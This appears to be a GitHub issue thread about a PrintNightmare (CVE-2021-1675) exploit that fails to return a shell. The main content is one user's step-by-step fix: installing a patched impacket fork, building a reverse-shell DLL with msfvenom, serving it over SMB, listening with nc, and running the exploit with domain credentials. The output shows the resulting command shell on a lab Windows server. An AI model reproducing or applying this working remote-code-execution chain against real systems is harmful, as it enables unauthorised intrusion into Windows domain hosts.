not returning shell

[cybertuxh4xor]

[CustosClarus]

it will solve for you if you use the domain user account not the admin

[sasdallas]

@CustosClarus what exactly do you mean by this?

[cybertuxh4xor]

It has been so many months ago I don’t remember anymore, all I know is that the tool was show complete with no errors and not return a reverse shell.

Sent from Proton Mail for iOS

On Fri, Mar 8, 2024 at 5:05 PM, Samuel @.***(mailto:On Fri, Mar 8, 2024 at 5:05 PM, Samuel < wrote:

@.***(https://github.com/CustosClarus) what exactly do you mean by this?

— Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: @.***>

[MiMaz7707]

im facing the same problem

[MiMaz7707]

Hello,

finally i managed to get the shell :D, the exploit will not work if you use a privileged user, the user must be a simple domain user

Steps :

1- remove preinstalled  impacket package

# arp remove --purge python3-impkacket
or 
# pip3 uninstall impacket

2- install the impacket package from cube0x0 repo

# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install

3- create a dll payload
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll

4- put the payload on shared folder and run smbserver.py or smbd service

# cp print64.dll /share/

# smbserver.py share /share -smb2support

/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

5- run nc for listening
# nc -lvp 9090
listening on [any] 9090 ...

6- run the exploit with a simple domain user, will generate some errors but it will work

# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll' 

[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
7- here is my shell :D 
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
SRV01

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
   IPv4 Address. . . . . . . . . . . : 192.168.117.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.117.254

Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>